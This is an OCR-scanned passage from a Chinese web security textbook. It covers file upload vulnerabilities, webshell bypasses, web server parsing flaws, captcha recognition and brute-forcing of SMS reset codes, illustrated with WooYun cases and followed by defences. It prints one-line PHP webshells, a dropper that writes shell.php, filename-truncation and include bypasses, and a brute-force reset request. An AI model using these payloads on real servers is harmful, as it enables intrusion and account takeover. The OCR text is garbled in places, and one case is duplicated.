攻击 者 可 以 上 传 一 个 可 执行 的 文件 到 服务 器 , 然后 通过 某 种 方式 执行 。 上 传 的 文件 可 以 
是 木马 、 病 毒 、 恶 意 脚 本 或 者 WebShell 等 。 这 些 攻击 方式 带 来 的 危害 是 最 直接 的 ， 且 文件 上 
传 漏洞 的 利用 技术 门槛 也 非常 低 ， 对 于 攻击 者 来 说 很 容易 实施 。 


2.6.1 利用 方式 


文件 上 传 漏洞 本 身 就 是 一 个 危害 巨大 的 漏洞 ，WebShell 更 是 将 这 种 漏洞 的 利用 无 限 扩 
大 。 大 多 数 上 传 漏洞 被 利用 后 ， 攻 击 者 都 会 留 下 WebShell 以 方便 后 续 进 入 系统 ， 攻 击 者 在 上 
传 WebShell 后 ， 可 通过 该 WebShell 更 轻松 、 更 隐蔽 地 在 服务 器 中 为 所 欲 为 。 

WebShell 是 以 网 页 文件 形式 存在 的 一 种 命令 执行 环境 ， 也 可 以 将 其 称 为 一 种 网 页 后 门 。 
攻击 者 在 入 侵 一 个 网 站 后 ， 通 常会 将 这 些 PHP 后 门 文件 与 网 站 服务 器 Web 目 录 下 正常 的 网 页 
文件 混在 一 起 ， 然 后 使 用 浏览 器 来 访问 这 些 后 门 ， 得 到 一 个 命令 执行 环境 ， 以 达到 控制 网 站 
服务 器 的 目的 ， 攻 击 者 可 以 通过 WebShell 上 传 下 载 或 者 修改 文件 、 操 作 数 据 库 、 执 行 任意 命 
令 等 。 
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WebShell 后 门 隐蔽 性 较 高 ， 可 以 轻松 穿越 防火 墙 ， 访 问 WebShell 时 不 会 留 下 系统 日 志 ， 
只 会 在 网 站 的 Web 日 志 中 留 下 一 些 数据 提交 记录 ， 没 有 经 验 的 管理 员 不 容易 发 现 入 侵 痕迹 。 
攻击 者 可 以 将 WebShell 隐 藏 在 正常 文件 中 并 修改 文件 时 间 以 增强 隐蔽 性 , 也 可 以 采用 一 些 函 
数 对 WebShell 进 行 编码 或 者 拼接 以 规避 检测 。 

除 此 之 外 ,通过 一 句 话 木 马 的 小 马 来 提 交 功 能 更 强大 的 大 马 可 以 更 容易 通过 应 用 本 身 的 
检测 。<?php eval($_POST[a]); ?> 就 是 一 个 最 常见 、 最 原始 的 小 马 ， 以 此 为 基础 也 涌现 了 很 多 
变种 ， 代 码 如 下 : 

<script language="php">eval($_ POST[al]);</script> 
2.6.2 上传 检测 

对 于 攻击 者 来 说 ， 突 破 文件 上 传 验证 最 好 的 方式 就 是 绕 过 ， 通 常 绕 过 分 为 两 种 类 型 : 客 
户 端 绕 过 和 服务 端 绕 过 。 

1. 客户 端 绕 过 

(1 ) 修改 后 组 名 

通过 一 些 抓 包工 具 修改 数据 包 ， 比 如 可 以 利用 Burp Suite 先 上 传 一 个 gif 类 型 的 木马 ， 然 
后 通过 Burp Suite 将 其 改 为 可 执行 脚本 ， 比 如 ASP、PHP、JSP 后 级 名 ， 但 是 这 种 绕 过 方法 建 
立 在 服务 端 没有 做 相应 的 检测 时 才能 利用 。 

(2) 文件 类 型 绕 过 

通常 后 端 会 通过 文件 类 型 来 限制 文件 的 上 传 ， 但 是 文件 的 类 型 其 实 是 前 端 传 到 后 端的 ， 
所 以 同样 可 以 通过 抓 取 并 修改 数据 包 将 content-type 字 段 改 为 image/gif 来 绕 过 服务 端 限制 。 

2. 服务 端 绕 过 

服务 端 绕 过 相对 来 说 复杂 一 些 ， 通 过 一 些 案例 的 总 结 ， 下 面 几 种 绕 过 方式 比较 常见 。 

(1) 文件 后 级 名 绕 过 

在 后 端 , 通常 还 会 校 验 和 再 次 验证 文件 后 级 名 ,一般 会 有 一 个 专门 的 黑 名 单 文 件 ， 里面 
包含 常见 的 危险 脚本 文件 后 级 名 。 

假设 文件 里 面包 含 以 下 后 缀 名 : 


jsp: jspx、 jspf; asp: asa、 cer、 aspx; 
php: php、 php3、 php4; 


Exe: exee 


那么 可 能 存在 大 小 写 绕 过 漏洞 ， 比 如 在 抓 取 到 的 数据 包 中 把 后 级 名 修改 为 ASP、PHP。 
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(2 ) 配合 操作 系统 文件 命令 规则 

不 同系 统 对 文件 名 的 命名 规则 不 一 致 , 攻击 者 会 利用 这 个 特性 来 达到 绕 过 的 目的 ， 比 如 
以 下 文件 名 不 符合 Windows 文 件 命名 规则 : 

test.asp. 

test.asp( 空 格 ) 

test.php:1.jpg 

test.php::$DATA 

shell.php::$SDATA...... 


以 上 文件 名 发 送 到 服务 器 后 ， 会 被 系统 的 特性 自动 截断 。 


(3 ) 配合 文件 包含 漏洞 

有 些 场景 可 以 上 传 任意 文件 ， 但 是 会 对 PHP 类 型 文件 的 内 容 做 安全 检测 ， 这 个 时 候 攻击 
者 可 以 先 上 传 一 个 内 容 为 木马 的 aaa.txt 后 绥 文 件 ， 因 为 后 缀 名 的 关系 没有 检验 内 容 ， 之 后 再 
上 传 一 个 .php 文 件 ， 内 容 为 <?php Include(“aaa.txt”);?>， 此 时 这 个 PHP 文 件 就 会 去 引用 TXT 文 
件 的 内 容 ， 从 而 达到 绕 过 校 验 的 效果 。 
2.6.3 ”解析 漏洞 

1. 漏洞 介绍 

开发 者 通常 会 对 上 传 文件 的 后 级 名 做 出 限制 ， 比 如 上 传 用 户头 像 的 时 候 , 限定 只 能 上 传 
图 片 格式 的 后 级 名 (JPG、PNG、GIF) ， 虽 然 Web 服 务 器 遇 到 PHP 后 缀 名 才 会 执行 脚本 ， 不 
过 一 些 老 版 本 的 Web 服 务 器 中 却 有 着 文件 后 级 名 解析 漏洞 ， 攻 击 者 可 以 上 传 一 个 名 字 为 
testjpg 的 文件 ， 文 件 内 容 却 是 PHP 代 码 的 文件 。 


<2php 

fputs(fopen('shell.php', 'w), '<2php eval($ POST[cmd])?>"); 

然后 利用 解析 漏洞 构造 一 个 可 利用 的 URL“test.jpg/.php”， 此 时 JPG 文 件 会 被 运行 ， 同 
时 这 个 目录 下 也 会 生成 一 句 话 木马 shell.php。 


2. 利用 方式 


(1) IIS5 与 IIS6 解析 漏洞 

在 IIS6 版 本 中 存在 目录 解析 漏洞 ， 当 攻击 者 访问 URL: http://www.localhost.test/aa.php/ 
xx.jpg 时 ,服务 器 默认 会 把 php 目录 下 的 文件 都 解析 成 PHP 文 件 ， 因 此 某 些 情况 下 后 缀 虽然 为 
JPG， 但 是 依然 会 被 当 作 PHP 来 执行 。 

在 IS5 和 IIS6 版 本 中 存在 文件 解析 漏洞 ， 当 攻击 者 访问 URL: http://www.localhost.test/ 
xx.php; :jpg 时 ， 服 务 器 默认 不 解析 “:;” 号 后 面 的 内 容 ， 因 此 xx.php;:jpg 便 被 解析 成 PHP 文 件 了 。 
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(2 ) Apache 解析 漏洞 

在 Apache 2.2 以 下 版 本 中 ，Apache 解 析 文 件 的 规则 是 从 右 到 左 开始 判断 解析 ， 如 果 后 组 
名 为 不 可 识别 的 文件 解析 ， 就 再 往 左 判断 。 比 如 test.php.owf.rar 中 ，“.owf” 和 “.rar” 两 种 
后 缀 是 Apache 不 可 识别 解析 ，Apache 会 把 test.php.owfrar 解 析 成 PHP。 

(3) Nginx 解析 漏洞 

在 Nginx 0.8.41~1.5.6 解 析 漏 洞 中 ， 攻 击 者 可 利用 的 方式 有 多 种 ， 如 URL 

(http://www.localhost.test/UploadFiles/image/1.jpg〉 在 正常 访问 时 会 作为 图 片 显示 ， 但 是 当 

攻击 者 使 用 另 一 种 方式 访问 时 ， 则 会 变 成 PHP 脚 本 执行 。 

目录 解析 : http://www.localhost.test/UploadFiles/image/1.jpg/1.php。 

截断 解析 : http://www.localhost.test/UploadFiles/image/1.jpg%00.php。 

截断 解析 : http://www.localhost.test/UploadFiles/image/1.jpg/%20\0.php。 





2.6.4 漏洞 防御 


1. 分 阶段 的 应 对 


(1) 系统 开发 阶段 的 防御 

项 目 还 在 开发 阶段 时 , 我 们 需要 应 对 文件 上 传 漏洞 的 影响 , 防范 的 最 好 方式 是 能 在 客户 
端 和 服务 器 端 对 用 户 上 传 的 文件 名 和 文件 路 径 等 项 目 进行 严格 的 检查 。 

客户 端的 检查 虽然 能 让 攻击 者 借助 工具 绕 过 , 但 这 也 会 增加 攻击 者 的 成 本 。 服 务 器 端的 
检查 最 好 使 用 白 名 单 过 滤 的 方法 ， 这 样 能 防止 大 小 写 等 方式 的 绕 过 ， 同 时 还 需 对 %00 截 断 符 
进行 检测 ， 对 HTTP 包 头 的 content-type 和 上 传 文件 的 大 小 也 需要 进行 检查 。 


(2 ) 系统 运行 阶段 的 防御 

系统 上 线 后 , 运 维和 人 员 应 该 有 较 强 的 安全 意识 , 积极 使 用 多 个 安全 检测 工具 对 系统 进行 
安全 扫描 ， 及 时 发 现 潜在 漏洞 并 修复 ， 同 时 定时 查看 系统 日 志和 Web 服 务 器 日 志 以 发 现 入 侵 
痕迹 。 定 时 关注 系统 所 使 用 的 第 三 方 插件 的 更 新 情况 ,如 有 新 版 本 发 布 建议 及 时 更 新 ， 如 果 
第 三 方 插件 有 安全 漏洞 ， 更 应 立即 进行 修补 。 

对 于 整个 网 站 都 使 用 的 是 开源 代码 或 者 使 用 网 上 的 框架 搭建 的 网 站 来 说 , 尤其 要 注意 漏 
洞 的 自 查 和 软件 版 本 及 补丁 的 更 新 ,上 传 功能 非 必需 可 以 直接 删除 。 除 了 对 系统 自身 的 维护 
外 , 还 要 对 服务 器 进行 合理 配置 , 非 必 选 的 目录 都 应 去 掉 执 行 权 限 ， 上传 目录 可 配置 为 只 读 。 
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2. 代码 处 理 方案 


攻击 者 想 让 自己 上 传 的 恶意 脚本 能 够 被 Web 服 务 器 执行 , 必要 的 条 件 就 是 开发 者 把 上 传 
的 文件 放 在 了 可 以 让 Web 服 务 器 所 执行 的 位 置 。 因 此 笔者 建议 文件 上 传 后 ， 所 在 的 目录 不 能 
是 Web 服 务 器 所 能 执行 的 位 置 ， 因 为 攻击 者 即使 能 够 从 Web 上 访问 恶意 脚本 文件 ， 但 无 法 通 
过 Web 服 务 器 执行 这 个 脚本 ， 也 就 不 能 称 之 为 漏洞 。 

最 后 攻击 者 上 传 的 文件 若 被 安全 检查 、 格 式 化 、 图 片 压 缩 等 功能 改变 了 内 容 ， 则 可 能 导 
致 攻击 失败 。 下 面 介 绍 防范 上 传 漏洞 的 几 种 方法 。 

(1) 文件 上 传 的 目录 设置 为 不 可 执行 

只 要 Web 服 务 器 无 法 解析 该 目录 下 的 文件 ,即使 攻击 者 上 传 了 脚本 文件 ， 服 务 器 本 身 也 
不 会 受到 影响 ， 这 一 点 至 关 重要 。 

(2 ) 判断 文件 类 型 

在 判断 文件 类 型 时 ， 可 以 结合 使 用 MIME Type 和 后 组 检查 等 方式 。 在 文件 类 型 检查 中 ， 
强烈 推荐 白 名 单方 式 ， 因 为 黑 名单 的 方式 非常 不 可 靠 ， 能 被 攻击 者 轻易 绕 过 。 对 于 图 片 的 处 
理 ， 可 以 使 用 压缩 函数 或 者 resize 函 数 ， 在 处 理 图 片 的 同时 破坏 图 片 中 可 能 包含 的 恶意 代码 。 


(3 ) 使 用 随机 数 改写 文件 名 和 文件 路 径 
文件 上 传 如 果 要 执行 代码 , 就 需要 用 户 能 够 访问 这 个 文件 。 在 某 些 环境 中 , 用 户 能 上 传 ， 
但 不 能 访问 。 如 果 应 用 随机 数 改写 文件 名 和 路 径 ， 将 极 大 地 增加 攻击 者 的 成 本 。 而 且 像 
shell.php.rar.rar 和 crossdomain.xml 这 种 文件 ， 都 将 因为 重 命名 而 无 法 攻击 。 


(4) 单独 设置 文件 服务 器 的 域名 
由 于 浏览 器 同 源 策略 的 关系 ,一 系列 客户 端 攻击 将 失效 ， 比 如 上 传 crossdomain.xml、 上 
传 包含 JavaScript 的 XSS 利 用 等 问题 将 得 到 解决 。 


2.6.5 ”漏洞 案例 


1. 文件 上 传 案例 


2013 年 2 月 ， 和 白 帽 子 “cnrstar” 提 交 漏 洞 “ 某 站 任意 文件 上 传 ”。 
缺陷 编号 : wooyun-2013-020276 。 


此 系统 是 一 个 论坛 站 点 ， 白 帽子 在 发 帖 处 发 现 有 一 个 上 传 附件 功 能 ， 如 图 2-54 所 示 。 
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图 2-54 上 传 附件 功能 


白 帽 子 想到 文件 上 传 或 许 会 存在 解析 漏洞 ,于 是 在 发 帖 时 做 了 一 番 测 试 。 首 先 通过 附件 
功能 上 传 PG 文件 ， 在 上 传 的 时 候 截 取 数 据 包 ， 然 后 修改 数据 包 的 后 缀 名 .jpg 为 jsp， 然 后 
成 功 把 JSP 传 上 去 。 

如 图 2-55 所 示 ， 帖 子 处 可 以 看 到 因为 附件 testjsp 的 内 容 依然 是 JPG 的 数据 ， 所 以 会 
报错 。 


话 - @ @ 国 orbs.baidu.com/jstp/150jhtml?res=r%2Fcms%2Fbbs%2Fbaidu 


i 


SEARCH COMMUNITY 
论坛 首页 。 ”搜索 主题 。 我 的 主 基 我 的 回复 


将 百度 开放 研究 社区 B85 - 机 器 知 我 心 一 推荐 | 萤 创 章 大 赛 ( 科技 创 异 京 第 一 季 ) » ttt 


主题 :ttt 


admintest Fa 


delDtest jsp 





妨 蚀 引用 忆 复 





图 2-55 更 改 后 缀 名 后 上 传 的 文件 


可 以 发 现 更 改 后 缀 名 可 以 上 传 成 功 ， 于 是 接着 进行 测试 ， 这 次 白 帽 子 先 新 建 了 一 个 
HTML 文件 ， 文 件 内 容 是 一 段 JavaScript 代码 ， 之 后 把 文件 名 改 为 JPG， 在 选择 附件 时 选择 
此 文件 ,提交 数据 时 再 把 PG 改 为 HTML, 于 是 得 到 URL 地 址 :http://orbs.localhost.com/u/cms/ 
www/201303/18195732ojg2.2.html， 当 在 新 标签 中 打开 此 URL 时 ， 可 以 看 到 JavaScript 代码 
已 经 被 执行 ， 如 图 2-56 所 示 。 
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orbs.baidu.com/u/cms/www/201303/181957320jg5.htm 


确定 








图 2-56 JavaScript 代码 已 经 被 执行 
2. 文件 后 缀 绕 过 漏洞 案例 


2012 年 1 月 ， 和 白 帽 子 “yelo” 提 交 漏 洞 “ 上 传 任意 文件 漏洞 ”。 
缺陷 编号 ，wooyun-2012-013505 。 


此 系统 是 一 个 开源 的 系统 , 白 帽 子 在 使 用 产品 时 对 其 源 代 码 进行 了 一 番 审 查 , 发 现 一 处 


文件 上 传 验证 不 严谨 漏洞 ， 代 码 如 下 : 


function uploadpic() 
{ 
if($_FILES['pic]) { 
/执行 上 传 操作 
$savePath = $this->_getSaveTempPath(); 
S$filename = md5$(time() . ‘teste’) . '.' . substr($_FILES['pic']['name’], 
strpos($_FILES['pic']['name'], ".") + 1); 
让 (@copy($_ FILES['pic][tmp_name'], $savePath . '/'. $filename) | 
@move_uploaded file($_FILES['pic']['tmp_name'], $savePath ./ . $filename)) { 
$result['boolen'] = 1; 
$result['type_data'] = temp/" . $filename; 
$result['picurl] = SITE_PATH . uploads/temp/ . $filename; 
}else { 
$result['boolen'] = 0; 
$result['message'] =' 上 传 失败 '; 
b 
}else{ 
$result['boolen'] = 0; 
$result['message'] =' 上 传 失败 '; 
} 


return $result; 
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在 此 代码 中 , 可 以 看 出 并 没有 对 文件 后 缀 做 限制 , 并 且 文件 后 缀 是 直接 从 提交 的 文件 中 
获取 的 。filename 的 生成 规则 是 ，md5( 时 间 截 )+ 文 件 后 缀 。 

在 发 现 此 处 文件 上 传 存在 的 问题 后 ， 白 帽子 找到 thinkSNS 官方 网 站 的 表单 ， 上 传 了 一 
个 附件 ， 并 通过 burp suite 修改 文件 后 缀 为 PHP， 并 得 到 了 URL 地 址 。 从 图 2-57 中 可 以 看 


出 代码 已 经 被 执行 。 





DO t.thinksns.com/data/uploads/2012/1018/14/507fa7c6ddab8.php 








System Linux localhost localdomain 26,18-92 el5 #1 SMP Tue Jun 10 18:49:47 EDT 2008 i686 





BuidDate |Jul212011 11:13.08 





Server AP! |Apache 20 Handler 





Vinual disabled 





区 sriocalphpS et 











Scan this dr |(nore) 


Loaded sriocalptpS etcprp nt 





图 2-57 上 传 的 代码 被 执行 


2.6.6 小结 


对 攻击 者 来 说 , 文件 上 传 漏洞 一 直 都 是 获取 服务 器 Shell 的 重要 途径 。 对 于 系统 维护 人 员 
来 说 ,文件 上 传 漏洞 的 巨大 危害 也 无 须 再 加 效 述 ， 只 有 不 断 学 习 , 深入 了 解 漏洞 的 相关 知识 


才能 够 更 从 容 地 面 对 这 类 攻击 。 
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在 此 代码 中 , 可 以 看 出 并 没有 对 文件 后 缀 做 限制 , 并 且 文件 后 缀 是 直接 从 提交 的 文件 中 
获取 的 。filename 的 生成 规则 是 ，md5( 时 间 截 )+ 文 件 后 缀 。 

在 发 现 此 处 文件 上 传 存在 的 问题 后 ， 白 帽子 找到 thinkSNS 官方 网 站 的 表单 ， 上 传 了 一 
个 附件 ， 并 通过 burp suite 修改 文件 后 缀 为 PHP， 并 得 到 了 URL 地 址 。 从 图 2-57 中 可 以 看 


出 代码 已 经 被 执行 。 





DO t.thinksns.com/data/uploads/2012/1018/14/507fa7c6ddab8.php 








System Linux localhost localdomain 26,18-92 el5 #1 SMP Tue Jun 10 18:49:47 EDT 2008 i686 





BuidDate |Jul212011 11:13.08 





Server AP! |Apache 20 Handler 





Vinual disabled 





区 sriocalphpS et 











Scan this dr |(nore) 


Loaded sriocalptpS etcprp nt 





图 2-57 上 传 的 代码 被 执行 


2.6.6 小结 


对 攻击 者 来 说 , 文件 上 传 漏洞 一 直 都 是 获取 服务 器 Shell 的 重要 途径 。 对 于 系统 维护 人 员 
来 说 ,文件 上 传 漏洞 的 巨大 危害 也 无 须 再 加 效 述 ， 只 有 不 断 学 习 , 深入 了 解 漏洞 的 相关 知识 


才能 够 更 从 容 地 面 对 这 类 攻击 。 
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业务 逻辑 漏洞 是 指 一 些 业务 类 型 特有 的 逻辑 漏洞 , 这 种 漏洞 的 特点 是 很 难 判断 是 否 为 漏 
洞 。 比 如 在 商城 系统 中 ， 用 户 张 三 可 以 查看 李 四 的 订单 信息 ， 对 于 计算 机 来 说 ,程序 运行 是 
没有 问题 的 ， 因 为 开发 人 员 就 是 这 么 设计 的 ， 但 对 于 用 户 来 说 ， 会 觉得 造成 隐私 信息 泄露 ， 
所 以 逻辑 漏洞 通常 需要 人 为 来 判断 是 否 为 漏洞 。 

本 章 将 介绍 常见 的 业务 逻辑 型 漏洞 ， 包 括 验证 码 安 全 、 用 户 密 码 找 回 、 接 口 次 用、 账户 
越权 、 支 付 漏洞 、SSRF 服 务 端 请 求 伪 造 等 逻辑 型 漏洞 问题 。 


3.1 验证 码 安全 


验证 码 的 作用 是 防止 某 个 攻击 者 使 用 特定 程序 暴力 破解 的 方式 进行 不 断 的 尝试 , 比如 常 
见 的 验证 码 用 来 防止 机 器 批量 注册 、 机 器 批量 发 帖 回复 等 ,为 了 防止 用 户 利用 机 器 人 自动 注 
册 、 登 录 、 灌 水 等 ， 大 部 分 网 站 都 采用 了 验证 码 技术 。 

在 Web 网 站 中 , 用 于 人 机 验证 最 常见 的 莫 过 于 验证 码 , 验证 码 用 于 人 机 验证 也 是 非常 有 
效 的 一 种 方式 ,不 过 有 些 验证 码 设计 上 却 有 大 问题 。 本 节 将 介绍 验证 码 的 原理 、 攻 击 者 常见 
的 破解 方法 以 及 开发 者 防范 的 方法 。 
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3.1.1 图 片 验证 码 
1. 图 片 验证 码 的 原理 


验证 码 就 是 每 次 访问 页 面 时 随机 生成 的 图 片 ,内容 一 般 是 数字 和 字母 ,也 有 复杂 的 中 文 ， 
需要 访问 者 把 图 中 的 数字 、 字 母 填 到 表单 中 提交 ， 这 样 就 有 效 地 防止 了 暴力 破解 。 验 证 码 也 
用 于 防止 恶意 灌水 、 广 告 帖 等 。 在 登录 的 地 方 访问 一 个 脚本 文件 ， 该 文件 生成 含 验证 码 的 图 
片 并 将 值 写 入 Session 中 , 提交 的 时 候 , 验证 登录 的 脚本 就 会 判断 提交 的 验证 码 是 否 与 Session 
里 的 一 致 ， 如 果 一 致 ， 就 允许 成 功 登 录 ， 否 则 提示 登录 失败 。 

图 片 验证 码 是 出 现 最 早 也 是 使 用 最 为 广泛 的 验证 码 , 从 最 开始 的 简单 验证 码 到 现在 各 种 
五 花 八 门 的 验证 码 ， 为 了 防止 被 识别 ， 通 常会 在 图 片上 加 噪点 、 加 干扰 线 、 加 各 种 背景 ， 以 
及 加 逻辑 题 等 。 下 面 是 比较 常见 的 生成 图 片 验证 码 的 代码 。 

<2php 

session start(); 

getCode(4, 60, 20); 

function getCode($num, $w, $h) 

{ 





$code = "; 
for ($i= 0; $i< $num; $i++) { 
S$code .= rand(0, 9); 
} 
//4 位 验证 码 也 可 以 用 rand(1000,9999) 直 接生 成 
// 将 生成 的 验证 码 写 入 Session， 备 验证 时 用 
$_SESSION["helloweba_num"] = $code; 
// 创 建 图 片 ， 定 义 颜色 值 
header("Content-type: image/PNG"); 
$im = imagecreate($w, $h); 
$black = imagecolorallocate($im, 0, 0, 0); 
S$gray = imagecolorallocate($im, 200, 200, 200); 
$bgcolor = imagecolorallocate($im, 255, 255, 255); 
// 填 充 背 景 
imagefill($im, 0, 0, $gray); 
// 画 边框 
imagerectangle($im, 0, 0, $w - 1, $h - 1, $black); 
// 随 机 绘制 两 条 虚线 ， 起 干扰 作用 
S$style = array($black, $black, $black, $black, $black, 
Sgray, $gray, $gray, Sgray, Sgray 
六 
imagesetstyle($im, $style); 
$y1 = rand(0, $h); 
$y2 = rand(0, $h); 
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$y3 = rand(0, $h); 
$y4 = rand(0, $h); 
imageline($im, 0, $y1, $w, $y3, IMG_COLOR STYLED); 
imageline($im, 0, $y2, $w, $y4, IMG_COLOR_ STYLED); 
// 在 画布 上 随机 生成 大 量 黑 点 ， 起 干扰 作用 
for ($i = 0; $i < 80; $i++) { 
imagesetpixel($im, rand(0, $w), rand(0, $h), $black); 


} 
// 将 数字 随机 显示 在 画布 上 ， 字 符 的 水 平 间距 和 位 置 都 按 一 定 波动 范围 随机 生成 
S$strx = rand(3, 8); 
for ($i= 0; $i < $num; $it+) { 
S$strpos = rand(1, 6); 
imagestring($im, 5, $strx, $strpos, substr($code, $i, 1), $black); 
$strx += rand(8, 12); 


} 

imagepng($im);// 输 出 图 片 

imagedestroy($im);// 释 放 图 片 所 占 内 存 
} 


生成 的 效果 如 下 : 


2. 图 片 验证 码 的 识别 方法 

看 到 生成 的 验证 码 东 倒 西 牌 , 还 有 一 些 噪点 , 为 什么 不 生成 一 张 好 看 一 点 的 图 片 呢 ? 主 
要 是 为 了 防止 验证 码 被 机 器 识别 ， 现 在 的 验证 码 识别 难度 也 在 不 断 上 升 。 

验证 码 识别 一 般 分 为 以 下 4 个 步骤 : 


取出 字模 ”时 。。 二 值 化 “ET 对 照样 本 


(1) 取出 字模 

识别 验证 码 毕竟 不 是 专业 的 OCR 识别 , 并 且 由 于 各 个 网 站 的 验证 码 各 不 相同 , 最 常见 的 
方法 就 是 建立 这 个 验证 码 的 特征 码 库 。 取 字模 时 ， 需 要 多 下 载 几 张 图 片 ， 使 这 些 图 片 中 包括 
所 有 的 字符 ， 这 里 的 字母 只 有 图 片 ， 所 以 只 要 收集 到 包括 0 一 9 的 图 片 即 可 。 

(2) 二 值 化 

二 值 化 就 是 把 图 片 验证 码 上 数字 的 每 个 像素 用 一 种 数字 表示 1, 其 他 部 分 用 0 表示 。 这样 
就 可 以 计算 出 每 个 数字 的 字模 ， 记 录 下 这 些 字模 ， 当 作 Key 即 可 。 
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(3 ) 计算 特征 
把 要 识别 的 图 片 进行 二 值 化 ， 得 到 图 片 特征 。 
(4) 对 照样 本 
把 步骤 (3) 中 的 图 片 特征 码 和 验证 码 的 字模 进行 对 比 ， 得 到 验证 码 图 片上 的 数字 。 
3. 图 片 验 证 码 识别 案例 
2012 年 9 月 ， 和 白 帽子 “Il4yn3” 提 交 漏 洞 “ 某 站 验证 码 容易 识别 的 bug”。 
缺陷 编号 : wooyun-2012-012722 。 
“i4yn3” 是 非常 活跃 的 一 位 白 帽子 ， 经 常 在 漏洞 报告 平台 提交 漏洞 ， 发 现 该 平台 的 验 
证 码 过 于 简单 ， 用 很 简单 的 程序 就 可 以 识别 出 来 ， 识 别 出 来 之 后 可 以 绕 过 验证 码 进行 灌水 ， 
于 是 写 了 一 段 绕 过 验证 码 自动 登录 的 代码 进行 测试 。 
验证 码 如 图 3-1 所 示 。 
KEM3 本 
图 3-1 验证 码 
3-1 中 验证 码 的 特征 如 下 : 
(1) 4 个 字符 。 
(2) 基本 无 干扰 因素 。 
(3) 字符 的 RGB 特征 分 别 为 (255,255,255) 或 (0, 0, 0)， 根 据 此 特征 可 识别 字符 。 
(4) 共 涉 及 字母 和 数字 22 个 ， 貌 似 没有 0 和 O、1 和 I， 可 能 是 怕 分 不 清楚 。 
(5) 字符 间距 各 1 个 像素 ， 很 固定 。 
(6) 字符 宽度 为 8 像素 ， 高 度 为 10 像素 ， 很 固定 。 
(7) 图 片上 间距 和 左 间距 固定 ， 各 为 4px 和 14px， 固 定 不 变 。 
识别 思路 : 
(1) 二 值 化 , 根据 字符 的 RGB 特征 分 别 为 (255,255,255) 或 (0, 0, 0) 将 字符 像素 变 成 1， 
其 他 为 0。 
(2) 取 字 模 ， 手 机 22 个 验证 码 字 符 的 二 进 制 字模 。 
(3) 与 乌云 验证 码 对 比 ， 识 别 验证 码 。 
分 析 后 很 轻松 地 拿 到 了 图 片 的 值 ， 如 图 3-2 所 示 。 
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图 3-2 获得 图 片 的 值 
自动 识别 验证 码 ， 并 成 功 登 录 的 截图 如 图 3-3 所 示 。 


<p><a href="¥"><img src="/images/search.jpg”olt=" 搜 索 ~ 
title-" 搜 索 "/></a><input type="text"/></p> 
</div> 


<div class="content"> 
<div cl success”™> 


<p> 合 陆 成 功 </p> 


<p><a 
LRA 
</div> 
</div> 


div < copyright™> 
right &copy; 2919 <a href-"#">www.wooyun.org</a> AL1 


Rights Reserve 
</div> 


</body> 
SLL ES 








图 3-3 自动 识别 验证 码 并 成 功 登录 
4. 图 片 验证 码 的 加 固 方法 


经 常 看 到 验证 码 上 有 很 多 干扰 符 , 主要 是 为 了 防止 机 器 识别 出 图 片 内 容 , 常见 的 验证 码 
会 用 以 下 加 固 方法 : 
字体 扭曲 
背景 色 干扰 
字体 粘连 
背景 字母 干扰 
字体 钴 空 
公式 验证 码 
字体 混用 
加 减法 验证 码 
主体 干扰 线 
逻辑 验证 码 
现在 有 很 多 打 码 平台 会 用 到 神经 网 络 的 方法 来 识别 验证 码 , 相 比 传统 的 识别 , 用 机 器 识 
别 的 识别 率 更 高 ， 对 一 些 人 眼 可 能 判断 错误 的 字母 ， 机 器 或 许 能 判断 准确 ， 不 过 学 习 成 本 也 
是 很 高 的 。 


多 


2 9 
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3.1.2 ”数字 暴力 破解 

1. 漏洞 成 因 

平时 注册 账号 、 修 改 密码 、 安 全 认证 等 方面 都 需要 用 到 验证 码 , 很 多 系统 为 了 让 用 户 体 
验 更 好 ， 只 设置 了 4 位 数字 的 验证 码 。 

这 种 4 位 数字 的 验证 码 让 用 户 方便 的 同时 ,也 带 来 了 安全 风险 ， 比 如 攻击 者 发 现 4 位 数字 
的 验证 码 ， 第 一 反应 可 能 就 会 思考 这 个 验证 码 是 否 可 以 暴力 破解 。 

2. 短信 验证 码 暴 力 破 解 案例 

2012 年 9 月 ， 白 帽子 “only_guest” 提 交 漏 洞 “ 任 意 用 户 密码 修改 漏洞 ”。 

缺陷 编号 : wooyun-2012-011720。 


在 此 系统 网 页 中 修改 密码 时 , 选择 通过 手机 号 码 修改 , 在 页 面 中 填 入 手机 号 码 就 可 以 看 
到 如 图 3-4 所 示 的 表单 。 

















重 设 微 信 窗 码 





图 3-4 看 到 的 表单 


在 表单 中 输入 相关 的 信息 后 ， 打 开 抓 包工 具 提 交 表 单 ， 会 抓 到 如 下 数据 包 : 


check=false& 
phone=18666666666& 
t=w_password_phone& 
isemail=0& 
value=18666666666& 
method=reset& 
country=A 86& 
getmethod=web& 
password=zZzzzzz& 
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Password2=Zzzzzzz&c 
verifycode=1234 


将 包 中 的 verifycode 使 用 工具 进行 反复 提交 后 ， 会 发 现 如 图 3-5 所 示 的 提示 信息 。 











































































































































































































Tesults | aroet positions | payloads | options 
request payload1 payload2 Sstatus | error limeo.| length |Succ. comment 
1627 lurs |2626 200 国 | 国 |4699 日 呈 
1628 lirs 2627 200 国 | 国 |46%2 
1629 lors 12628 200 "| 4699 | 
1630 |prs 12629 200 国 | 国 | 和 2 目 
1631 |ars 12630 200 目 4699 
1633 ”|qs 2632 200 国 | 4699 
1635 |ets [2634 200 国 4699 
1636 Ins 12635 200 目 | 目 | 和 2 加 | 
1637 1 12636 200 白 | 品 |4699 日 
1638 Ys [2637 200 目 | 目 6673 口 
1639 |uts |2638 200 日 | 器 |4699 -| 
1640 lits [2639 200 国 4692 
1641 |ots |2640 200 白 | 四 |4699 
1642 |pts [2641 200 国 4692 已 
加 = 
request | response 
raw | headers | hex | html | render 
class="ps_con"><div class="|left_con"><img class="ico_suc" | 
src="/zh_CN/htmledition/images/weixin/icon_successful0c0705.png" 
alt=" 成 功 Succeeded" /></div><div class="right_con"><h3 
class="p_con"> 您 的 微 信 密 码 已 重 设 成 功 </h3></div></div><div 
[| ] 0 matches 

















inished 


3-5 ”提示 密码 已 经 修改 成 功 


其 中 一 个 验证 码 猜测 对 了 ， 返 回 修改 密码 成 功 提示 。 


这 个 地 方 的 薄弱 环节 在 于 微 信 重 置 密码 的 验证 码 为 4、5 位 纯 数字 , 且 数字 范围 在 0000 一 
9999。 也 就 是 说 ， 只 要 尝试 10 000 次 ， 白 帽子 用 50 个 线程 发 送 数据 包 ，3 分 钟 便 能 成 功 修 
改 一 个 密码 。 


3. 防范 方法 
上 述 问题 出 现 的 主要 原因 是 验证 码 位 数 太 短 , 因此 笔者 建议 开发 者 在 设计 短信 验证 码 的 
